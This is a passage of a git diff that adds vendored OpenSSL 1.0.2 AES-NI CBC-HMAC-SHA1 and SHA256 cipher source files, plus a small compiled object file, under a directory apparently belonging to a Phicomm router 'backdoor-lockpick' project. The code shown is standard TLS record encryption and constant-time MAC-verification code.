+        ciph_d[i].inp = ciph_d[i].out;
+
+        out += 5 + 16 + len;
+
+        /* write MAC */
+        PUTU32(out + 0, ctx->A[i]);
+        PUTU32(out + 4, ctx->B[i]);
+        PUTU32(out + 8, ctx->C[i]);
+        PUTU32(out + 12, ctx->D[i]);
+        PUTU32(out + 16, ctx->E[i]);
+        out += 20;
+        len += 20;
+
+        /* pad */
+        pad = 15 - len % 16;
+        for (j = 0; j <= pad; j++)
+            *(out++) = pad;
+        len += pad + 1;
+
+        ciph_d[i].blocks = (len - processed) / 16;
+        len += 16;              /* account for explicit iv */
+
+        /* arrange header */
+        out0[0] = ((u8 *)key->md.data)[8];
+        out0[1] = ((u8 *)key->md.data)[9];
+        out0[2] = ((u8 *)key->md.data)[10];
+        out0[3] = (u8)(len >> 8);
+        out0[4] = (u8)(len);
+
+        ret += len + 5;
+        inp += frag;
+    }
+
+    aesni_multi_cbc_encrypt(ciph_d, &key->ks, n4x);
+
+    OPENSSL_cleanse(blocks, sizeof(blocks));
+    OPENSSL_cleanse(ctx, sizeof(*ctx));
+
+    return ret;
+}
+#  endif
+
+static int aesni_cbc_hmac_sha1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                      const unsigned char *in, size_t len)
+{
+    EVP_AES_HMAC_SHA1 *key = data(ctx);
+    unsigned int l;
+    size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and
+                                                * later */
+        sha_off = 0;
+#  if defined(STITCHED_CALL)
+    size_t aes_off = 0, blocks;
+
+    sha_off = SHA_CBLOCK - key->md.num;
+#  endif
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    if (len % AES_BLOCK_SIZE)
+        return 0;
+
+    if (ctx->encrypt) {
+        if (plen == NO_PAYLOAD_LENGTH)
+            plen = len;
+        else if (len !=
+                 ((plen + SHA_DIGEST_LENGTH +
+                   AES_BLOCK_SIZE) & -AES_BLOCK_SIZE))
+            return 0;
+        else if (key->aux.tls_ver >= TLS1_1_VERSION)
+            iv = AES_BLOCK_SIZE;
+
+#  if defined(STITCHED_CALL)
+        if (plen > (sha_off + iv)
+            && (blocks = (plen - (sha_off + iv)) / SHA_CBLOCK)) {
+            SHA1_Update(&key->md, in + iv, sha_off);
+
+            aesni_cbc_sha1_enc(in, out, blocks, &key->ks,
+                               ctx->iv, &key->md, in + iv + sha_off);
+            blocks *= SHA_CBLOCK;
+            aes_off += blocks;
+            sha_off += blocks;
+            key->md.Nh += blocks >> 29;
+            key->md.Nl += blocks <<= 3;
+            if (key->md.Nl < (unsigned int)blocks)
+                key->md.Nh++;
+        } else {
+            sha_off = 0;
+        }
+#  endif
+        sha_off += iv;
+        SHA1_Update(&key->md, in + sha_off, plen - sha_off);
+
+        if (plen != len) {      /* "TLS" mode of operation */
+            if (in != out)
+                memcpy(out + aes_off, in + aes_off, plen - aes_off);
+
+            /* calculate HMAC and append it to payload */
+            SHA1_Final(out + plen, &key->md);
+            key->md = key->tail;
+            SHA1_Update(&key->md, out + plen, SHA_DIGEST_LENGTH);
+            SHA1_Final(out + plen, &key->md);
+
+            /* pad the payload|hmac */
+            plen += SHA_DIGEST_LENGTH;
+            for (l = len - plen - 1; plen < len; plen++)
+                out[plen] = l;
+            /* encrypt HMAC|padding at once */
+            aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off,
+                              &key->ks, ctx->iv, 1);
+        } else {
+            aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off,
+                              &key->ks, ctx->iv, 1);
+        }
+    } else {
+        union {
+            unsigned int u[SHA_DIGEST_LENGTH / sizeof(unsigned int)];
+            unsigned char c[32 + SHA_DIGEST_LENGTH];
+        } mac, *pmac;
+
+        /* arrange cache line alignment */
+        pmac = (void *)(((size_t)mac.c + 31) & ((size_t)0 - 32));
+
+        if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */
+            size_t inp_len, mask, j, i;
+            unsigned int res, maxpad, pad, bitlen;
+            int ret = 1;
+            union {
+                unsigned int u[SHA_LBLOCK];
+                unsigned char c[SHA_CBLOCK];
+            } *data = (void *)key->md.data;
+#  if defined(STITCHED_DECRYPT_CALL)
+            unsigned char tail_iv[AES_BLOCK_SIZE];
+            int stitch = 0;
+#  endif
+
+            if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3])
+                >= TLS1_1_VERSION) {
+                if (len < (AES_BLOCK_SIZE + SHA_DIGEST_LENGTH + 1))
+                    return 0;
+
+                /* omit explicit iv */
+                memcpy(ctx->iv, in, AES_BLOCK_SIZE);
+                in += AES_BLOCK_SIZE;
+                out += AES_BLOCK_SIZE;
+                len -= AES_BLOCK_SIZE;
+            } else if (len < (SHA_DIGEST_LENGTH + 1))
+                return 0;
+
+#  if defined(STITCHED_DECRYPT_CALL)
+            if (len >= 1024 && ctx->key_len == 32) {
+                /* decrypt last block */
+                memcpy(tail_iv, in + len - 2 * AES_BLOCK_SIZE,
+                       AES_BLOCK_SIZE);
+                aesni_cbc_encrypt(in + len - AES_BLOCK_SIZE,
+                                  out + len - AES_BLOCK_SIZE, AES_BLOCK_SIZE,
+                                  &key->ks, tail_iv, 0);
+                stitch = 1;
+            } else
+#  endif
+                /* decrypt HMAC|padding at once */
+                aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0);
+
+            /* figure out payload length */
+            pad = out[len - 1];
+            maxpad = len - (SHA_DIGEST_LENGTH + 1);
+            maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8);
+            maxpad &= 255;
+
+            inp_len = len - (SHA_DIGEST_LENGTH + pad + 1);
+            mask = (0 - ((inp_len - len) >> (sizeof(inp_len) * 8 - 1)));
+            inp_len &= mask;
+            ret &= (int)mask;
+
+            key->aux.tls_aad[plen - 2] = inp_len >> 8;
+            key->aux.tls_aad[plen - 1] = inp_len;
+
+            /* calculate HMAC */
+            key->md = key->head;
+            SHA1_Update(&key->md, key->aux.tls_aad, plen);
+
+#  if defined(STITCHED_DECRYPT_CALL)
+            if (stitch) {
+                blocks = (len - (256 + 32 + SHA_CBLOCK)) / SHA_CBLOCK;
+                aes_off = len - AES_BLOCK_SIZE - blocks * SHA_CBLOCK;
+                sha_off = SHA_CBLOCK - plen;
+
+                aesni_cbc_encrypt(in, out, aes_off, &key->ks, ctx->iv, 0);
+
+                SHA1_Update(&key->md, out, sha_off);
+                aesni256_cbc_sha1_dec(in + aes_off,
+                                      out + aes_off, blocks, &key->ks,
+                                      ctx->iv, &key->md, out + sha_off);
+
+                sha_off += blocks *= SHA_CBLOCK;
+                out += sha_off;
+                len -= sha_off;
+                inp_len -= sha_off;
+
+                key->md.Nl += (blocks << 3); /* at most 18 bits */
+                memcpy(ctx->iv, tail_iv, AES_BLOCK_SIZE);
+            }
+#  endif
+
+#  if 1
+            len -= SHA_DIGEST_LENGTH; /* amend mac */
+            if (len >= (256 + SHA_CBLOCK)) {
+                j = (len - (256 + SHA_CBLOCK)) & (0 - SHA_CBLOCK);
+                j += SHA_CBLOCK - key->md.num;
+                SHA1_Update(&key->md, out, j);
+                out += j;
+                len -= j;
+                inp_len -= j;
+            }
+
+            /* but pretend as if we hashed padded payload */
+            bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */
+#   ifdef BSWAP4
+            bitlen = BSWAP4(bitlen);
+#   else
+            mac.c[0] = 0;
+            mac.c[1] = (unsigned char)(bitlen >> 16);
+            mac.c[2] = (unsigned char)(bitlen >> 8);
+            mac.c[3] = (unsigned char)bitlen;
+            bitlen = mac.u[0];
+#   endif
+
+            pmac->u[0] = 0;
+            pmac->u[1] = 0;
+            pmac->u[2] = 0;
+            pmac->u[3] = 0;
+            pmac->u[4] = 0;
+
+            for (res = key->md.num, j = 0; j < len; j++) {
+                size_t c = out[j];
+                mask = (j - inp_len) >> (sizeof(j) * 8 - 8);
+                c &= mask;
+                c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8));
+                data->c[res++] = (unsigned char)c;
+
+                if (res != SHA_CBLOCK)
+                    continue;
+
+                /* j is not incremented yet */
+                mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1));
+                data->u[SHA_LBLOCK - 1] |= bitlen & mask;
+                sha1_block_data_order(&key->md, data, 1);
+                mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1));
+                pmac->u[0] |= key->md.h0 & mask;
+                pmac->u[1] |= key->md.h1 & mask;
+                pmac->u[2] |= key->md.h2 & mask;
+                pmac->u[3] |= key->md.h3 & mask;
+                pmac->u[4] |= key->md.h4 & mask;
+                res = 0;
+            }
+
+            for (i = res; i < SHA_CBLOCK; i++, j++)
+                data->c[i] = 0;
+
+            if (res > SHA_CBLOCK - 8) {
+                mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1));
+                data->u[SHA_LBLOCK - 1] |= bitlen & mask;
+                sha1_block_data_order(&key->md, data, 1);
+                mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1));
+                pmac->u[0] |= key->md.h0 & mask;
+                pmac->u[1] |= key->md.h1 & mask;
+                pmac->u[2] |= key->md.h2 & mask;
+                pmac->u[3] |= key->md.h3 & mask;
+                pmac->u[4] |= key->md.h4 & mask;
+
+                memset(data, 0, SHA_CBLOCK);
+                j += 64;
+            }
+            data->u[SHA_LBLOCK - 1] = bitlen;
+            sha1_block_data_order(&key->md, data, 1);
+            mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1));
+            pmac->u[0] |= key->md.h0 & mask;
+            pmac->u[1] |= key->md.h1 & mask;
+            pmac->u[2] |= key->md.h2 & mask;
+            pmac->u[3] |= key->md.h3 & mask;
+            pmac->u[4] |= key->md.h4 & mask;
+
+#   ifdef BSWAP4
+            pmac->u[0] = BSWAP4(pmac->u[0]);
+            pmac->u[1] = BSWAP4(pmac->u[1]);
+            pmac->u[2] = BSWAP4(pmac->u[2]);
+            pmac->u[3] = BSWAP4(pmac->u[3]);
+            pmac->u[4] = BSWAP4(pmac->u[4]);
+#   else
+            for (i = 0; i < 5; i++) {
+                res = pmac->u[i];
+                pmac->c[4 * i + 0] = (unsigned char)(res >> 24);
+                pmac->c[4 * i + 1] = (unsigned char)(res >> 16);
+                pmac->c[4 * i + 2] = (unsigned char)(res >> 8);
+                pmac->c[4 * i + 3] = (unsigned char)res;
+            }
+#   endif
+            len += SHA_DIGEST_LENGTH;
+#  else
+            SHA1_Update(&key->md, out, inp_len);
+            res = key->md.num;
+            SHA1_Final(pmac->c, &key->md);
+
+            {
+                unsigned int inp_blocks, pad_blocks;
+
+                /* but pretend as if we hashed padded payload */
+                inp_blocks =
+                    1 + ((SHA_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1));
+                res += (unsigned int)(len - inp_len);
+                pad_blocks = res / SHA_CBLOCK;
+                res %= SHA_CBLOCK;
+                pad_blocks +=
+                    1 + ((SHA_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1));
+                for (; inp_blocks < pad_blocks; inp_blocks++)
+                    sha1_block_data_order(&key->md, data, 1);
+            }
+#  endif
+            key->md = key->tail;
+            SHA1_Update(&key->md, pmac->c, SHA_DIGEST_LENGTH);
+            SHA1_Final(pmac->c, &key->md);
+
+            /* verify HMAC */
+            out += inp_len;
+            len -= inp_len;
+#  if 1
+            {
+                unsigned char *p = out + len - 1 - maxpad - SHA_DIGEST_LENGTH;
+                size_t off = out - p;
+                unsigned int c, cmask;
+
+                maxpad += SHA_DIGEST_LENGTH;
+                for (res = 0, i = 0, j = 0; j < maxpad; j++) {
+                    c = p[j];
+                    cmask =
+                        ((int)(j - off - SHA_DIGEST_LENGTH)) >> (sizeof(int) *
+                                                                 8 - 1);
+                    res |= (c ^ pad) & ~cmask; /* ... and padding */
+                    cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1);
+                    res |= (c ^ pmac->c[i]) & cmask;
+                    i += 1 & cmask;
+                }
+                maxpad -= SHA_DIGEST_LENGTH;
+
+                res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1));
+                ret &= (int)~res;
+            }
+#  else
+            for (res = 0, i = 0; i < SHA_DIGEST_LENGTH; i++)
+                res |= out[i] ^ pmac->c[i];
+            res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1));
+            ret &= (int)~res;
+
+            /* verify padding */
+            pad = (pad & ~res) | (maxpad & res);
+            out = out + len - 1 - pad;
+            for (res = 0, i = 0; i < pad; i++)
+                res |= out[i] ^ pad;
+
+            res = (0 - res) >> (sizeof(res) * 8 - 1);
+            ret &= (int)~res;
+#  endif
+            return ret;
+        } else {
+#  if defined(STITCHED_DECRYPT_CALL)
+            if (len >= 1024 && ctx->key_len == 32) {
+                if (sha_off %= SHA_CBLOCK)
+                    blocks = (len - 3 * SHA_CBLOCK) / SHA_CBLOCK;
+                else
+                    blocks = (len - 2 * SHA_CBLOCK) / SHA_CBLOCK;
+                aes_off = len - blocks * SHA_CBLOCK;
+
+                aesni_cbc_encrypt(in, out, aes_off, &key->ks, ctx->iv, 0);
+                SHA1_Update(&key->md, out, sha_off);
+                aesni256_cbc_sha1_dec(in + aes_off,
+                                      out + aes_off, blocks, &key->ks,
+                                      ctx->iv, &key->md, out + sha_off);
+
+                sha_off += blocks *= SHA_CBLOCK;
+                out += sha_off;
+                len -= sha_off;
+
+                key->md.Nh += blocks >> 29;
+                key->md.Nl += blocks <<= 3;
+                if (key->md.Nl < (unsigned int)blocks)
+                    key->md.Nh++;
+            } else
+#  endif
+                /* decrypt HMAC|padding at once */
+                aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0);
+
+            SHA1_Update(&key->md, out, len);
+        }
+    }
+
+    return 1;
+}
+
+static int aesni_cbc_hmac_sha1_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg,
+                                    void *ptr)
+{
+    EVP_AES_HMAC_SHA1 *key = data(ctx);
+
+    switch (type) {
+    case EVP_CTRL_AEAD_SET_MAC_KEY:
+        {
+            unsigned int i;
+            unsigned char hmac_key[64];
+
+            memset(hmac_key, 0, sizeof(hmac_key));
+
+            if (arg > (int)sizeof(hmac_key)) {
+                SHA1_Init(&key->head);
+                SHA1_Update(&key->head, ptr, arg);
+                SHA1_Final(hmac_key, &key->head);
+            } else {
+                memcpy(hmac_key, ptr, arg);
+            }
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36; /* ipad */
+            SHA1_Init(&key->head);
+            SHA1_Update(&key->head, hmac_key, sizeof(hmac_key));
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36 ^ 0x5c; /* opad */
+            SHA1_Init(&key->tail);
+            SHA1_Update(&key->tail, hmac_key, sizeof(hmac_key));
+
+            OPENSSL_cleanse(hmac_key, sizeof(hmac_key));
+
+            return 1;
+        }
+    case EVP_CTRL_AEAD_TLS1_AAD:
+        {
+            unsigned char *p = ptr;
+            unsigned int len = p[arg - 2] << 8 | p[arg - 1];
+
+            if (ctx->encrypt) {
+                key->payload_length = len;
+                if ((key->aux.tls_ver =
+                     p[arg - 4] << 8 | p[arg - 3]) >= TLS1_1_VERSION) {
+                    len -= AES_BLOCK_SIZE;
+                    p[arg - 2] = len >> 8;
+                    p[arg - 1] = len;
+                }
+                key->md = key->head;
+                SHA1_Update(&key->md, p, arg);
+
+                return (int)(((len + SHA_DIGEST_LENGTH +
+                               AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)
+                             - len);
+            } else {
+                if (arg > 13)
+                    arg = 13;
+                memcpy(key->aux.tls_aad, ptr, arg);
+                key->payload_length = arg;
+
+                return SHA_DIGEST_LENGTH;
+            }
+        }
+#  if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_MAX_BUFSIZE:
+        return (int)(5 + 16 + ((arg + 20 + 16) & -16));
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_AAD:
+        {
+            EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *param =
+                (EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *) ptr;
+            unsigned int n4x = 1, x4;
+            unsigned int frag, last, packlen, inp_len;
+
+            if (arg < (int)sizeof(EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM))
+                return -1;
+
+            inp_len = param->inp[11] << 8 | param->inp[12];
+
+            if (ctx->encrypt) {
+                if ((param->inp[9] << 8 | param->inp[10]) < TLS1_1_VERSION)
+                    return -1;
+
+                if (inp_len) {
+                    if (inp_len < 4096)
+                        return 0; /* too short */
+
+                    if (inp_len >= 8192 && OPENSSL_ia32cap_P[2] & (1 << 5))
+                        n4x = 2; /* AVX2 */
+                } else if ((n4x = param->interleave / 4) && n4x <= 2)
+                    inp_len = param->len;
+                else
+                    return -1;
+
+                key->md = key->head;
+                SHA1_Update(&key->md, param->inp, 13);
+
+                x4 = 4 * n4x;
+                n4x += 1;
+
+                frag = inp_len >> n4x;
+                last = inp_len + frag - (frag << n4x);
+                if (last > frag && ((last + 13 + 9) % 64 < (x4 - 1))) {
+                    frag++;
+                    last -= x4 - 1;
+                }
+
+                packlen = 5 + 16 + ((frag + 20 + 16) & -16);
+                packlen = (packlen << n4x) - packlen;
+                packlen += 5 + 16 + ((last + 20 + 16) & -16);
+
+                param->interleave = x4;
+
+                return (int)packlen;
+            } else
+                return -1;      /* not yet */
+        }
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_ENCRYPT:
+        {
+            EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *param =
+                (EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *) ptr;
+
+            return (int)tls1_1_multi_block_encrypt(key, param->out,
+                                                   param->inp, param->len,
+                                                   param->interleave / 4);
+        }
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_DECRYPT:
+#  endif
+    default:
+        return -1;
+    }
+}
+
+static EVP_CIPHER aesni_128_cbc_hmac_sha1_cipher = {
+#  ifdef NID_aes_128_cbc_hmac_sha1
+    NID_aes_128_cbc_hmac_sha1,
+#  else
+    NID_undef,
+#  endif
+    16, 16, 16,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_FLAG_DEFAULT_ASN1 |
+        EVP_CIPH_FLAG_AEAD_CIPHER | EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK,
+    aesni_cbc_hmac_sha1_init_key,
+    aesni_cbc_hmac_sha1_cipher,
+    NULL,
+    sizeof(EVP_AES_HMAC_SHA1),
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_set_asn1_iv,
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_get_asn1_iv,
+    aesni_cbc_hmac_sha1_ctrl,
+    NULL
+};
+
+static EVP_CIPHER aesni_256_cbc_hmac_sha1_cipher = {
+#  ifdef NID_aes_256_cbc_hmac_sha1
+    NID_aes_256_cbc_hmac_sha1,
+#  else
+    NID_undef,
+#  endif
+    16, 32, 16,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_FLAG_DEFAULT_ASN1 |
+        EVP_CIPH_FLAG_AEAD_CIPHER | EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK,
+    aesni_cbc_hmac_sha1_init_key,
+    aesni_cbc_hmac_sha1_cipher,
+    NULL,
+    sizeof(EVP_AES_HMAC_SHA1),
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_set_asn1_iv,
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_get_asn1_iv,
+    aesni_cbc_hmac_sha1_ctrl,
+    NULL
+};
+
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha1(void)
+{
+    return (OPENSSL_ia32cap_P[1] & AESNI_CAPABLE ?
+            &aesni_128_cbc_hmac_sha1_cipher : NULL);
+}
+
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha1(void)
+{
+    return (OPENSSL_ia32cap_P[1] & AESNI_CAPABLE ?
+            &aesni_256_cbc_hmac_sha1_cipher : NULL);
+}
+# else
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha1(void)
+{
+    return NULL;
+}
+
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha1(void)
+{
+    return NULL;
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.o
new file mode 100644
index 0000000000000000000000000000000000000000..2f25770ac92e31c780f32ba1bef2c3484a752ae6
GIT binary patch
literal 1488
zcmbtT&1w`u5U$BYvue;71civKClyVzvq?01kb$t~pac;jUS#N<v>DLZ4Kuxv^`Jh2
zkKm&Od;uT9qgV0fMXP$NW;?xm(t_@<>Z|&yf2QYS@7a@uC<3tv9>X*e7U0{$)K8t8
z!ZKWdUzcwDPENiu!0yh@qxS9n{%BxF?T2bZb=H#yBNrwgx*gToyfdMt+afwEIL_eM
z-P;FT=7hKy2icVgK=l3vM8_-9+VWECGj5PH*EzSuNL(l2IGh1G<0Ab0Gm}6fo_hnt
zdzat|<7T%W>H5&AW-W%Zvm`Px$VpD8W87(ISCLrt_9@DQd5HzVWZKkO-p{k5)Ol7H
zI#D_FUOsnx(%n9tYck!f`$5KSrR`>LH{##QX23V=t9o2o-3L|MYJ!D$)*M?<2ij^-
z{kjH~56jXFkQ)rGQTQy@Ype6O93Kuw>ZlqXnaYkqRpy;mrpVq@x-`7_f4~}Q>1~8x
zDCM3P83n?B<t8SGllLoid*TEb>ThAbh2vlK_fShc<v&2znXG?T2u4|7a0_|y{nD`?
zcz#&h!yJ8c|4mT&Cz{aOZk|qbR^MJ@Ks`hK7cNQ}1w#EROwiwwN&(|GH<Wuhhdk|5
y^w+p<-rAJ<&iNJ}_&mncBh(WYemj!>VBJ#+JY%|HE~7V3U-149o63n3>i+^RC1WW7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.c
new file mode 100644
index 0000000..30398c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.c
@@ -0,0 +1,970 @@
+/* ====================================================================
+ * Copyright (c) 2011-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <stdio.h>
+#include <string.h>
+
+#if !defined(OPENSSL_NO_AES) && !defined(OPENSSL_NO_SHA256)
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/aes.h>
+# include <openssl/sha.h>
+# include <openssl/rand.h>
+# include "modes_lcl.h"
+
+# ifndef EVP_CIPH_FLAG_AEAD_CIPHER
+#  define EVP_CIPH_FLAG_AEAD_CIPHER       0x200000
+#  define EVP_CTRL_AEAD_TLS1_AAD          0x16
+#  define EVP_CTRL_AEAD_SET_MAC_KEY       0x17
+# endif
+
+# if !defined(EVP_CIPH_FLAG_DEFAULT_ASN1)
+#  define EVP_CIPH_FLAG_DEFAULT_ASN1 0
+# endif
+
+# if !defined(EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK)
+#  define EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK 0
+# endif
+
+# define TLS1_1_VERSION 0x0302
+
+typedef struct {
+    AES_KEY ks;
+    SHA256_CTX head, tail, md;
+    size_t payload_length;      /* AAD length in decrypt case */
+    union {
+        unsigned int tls_ver;
+        unsigned char tls_aad[16]; /* 13 used */
+    } aux;
+} EVP_AES_HMAC_SHA256;
+
+# define NO_PAYLOAD_LENGTH       ((size_t)-1)
+
+# if     defined(AES_ASM) &&     ( \
+        defined(__x86_64)       || defined(__x86_64__)  || \
+        defined(_M_AMD64)       || defined(_M_X64)      || \
+        defined(__INTEL__)      )
+
+extern unsigned int OPENSSL_ia32cap_P[3];
+#  define AESNI_CAPABLE   (1<<(57-32))
+
+int aesni_set_encrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+int aesni_set_decrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+
+void aesni_cbc_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key, unsigned char *ivec, int enc);
+
+int aesni_cbc_sha256_enc(const void *inp, void *out, size_t blocks,
+                         const AES_KEY *key, unsigned char iv[16],
+                         SHA256_CTX *ctx, const void *in0);
+
+#  define data(ctx) ((EVP_AES_HMAC_SHA256 *)(ctx)->cipher_data)
+
+static int aesni_cbc_hmac_sha256_init_key(EVP_CIPHER_CTX *ctx,
+                                          const unsigned char *inkey,
+                                          const unsigned char *iv, int enc)
+{
+    EVP_AES_HMAC_SHA256 *key = data(ctx);
+    int ret;
+
+    if (enc)
+        memset(&key->ks, 0, sizeof(key->ks.rd_key)),
+            ret = aesni_set_encrypt_key(inkey, ctx->key_len * 8, &key->ks);
+    else
+        ret = aesni_set_decrypt_key(inkey, ctx->key_len * 8, &key->ks);
+
+    SHA256_Init(&key->head);    /* handy when benchmarking */
+    key->tail = key->head;
+    key->md = key->head;
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    return ret < 0 ? 0 : 1;
+}
+
+#  define STITCHED_CALL
+
+#  if !defined(STITCHED_CALL)
+#   define aes_off 0
+#  endif
+
+void sha256_block_data_order(void *c, const void *p, size_t len);
+
+static void sha256_update(SHA256_CTX *c, const void *data, size_t len)
+{
+    const unsigned char *ptr = data;
+    size_t res;
+
+    if ((res = c->num)) {
+        res = SHA256_CBLOCK - res;
+        if (len < res)
+            res = len;
+        SHA256_Update(c, ptr, res);
+        ptr += res;
+        len -= res;
+    }
+
+    res = len % SHA256_CBLOCK;
+    len -= res;
+
+    if (len) {
+        sha256_block_data_order(c, ptr, len / SHA256_CBLOCK);
+
+        ptr += len;
+        c->Nh += len >> 29;
+        c->Nl += len <<= 3;
+        if (c->Nl < (unsigned int)len)
+            c->Nh++;
+    }
+
+    if (res)
+        SHA256_Update(c, ptr, res);
+}
+
+#  ifdef SHA256_Update
+#   undef SHA256_Update
+#  endif
+#  define SHA256_Update sha256_update
+
+#  if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+
+typedef struct {
+    unsigned int A[8], B[8], C[8], D[8], E[8], F[8], G[8], H[8];
+} SHA256_MB_CTX;
+typedef struct {
+    const unsigned char *ptr;
+    int blocks;
+} HASH_DESC;
+
+void sha256_multi_block(SHA256_MB_CTX *, const HASH_DESC *, int);
+
+typedef struct {
+    const unsigned char *inp;
+    unsigned char *out;
+    int blocks;
+    u64 iv[2];
+} CIPH_DESC;
+
+void aesni_multi_cbc_encrypt(CIPH_DESC *, void *, int);
+
+static size_t tls1_1_multi_block_encrypt(EVP_AES_HMAC_SHA256 *key,
+                                         unsigned char *out,
+                                         const unsigned char *inp,
+                                         size_t inp_len, int n4x)
+{                               /* n4x is 1 or 2 */
+    HASH_DESC hash_d[8], edges[8];
+    CIPH_DESC ciph_d[8];
+    unsigned char storage[sizeof(SHA256_MB_CTX) + 32];
+    union {
+        u64 q[16];
+        u32 d[32];
+        u8 c[128];
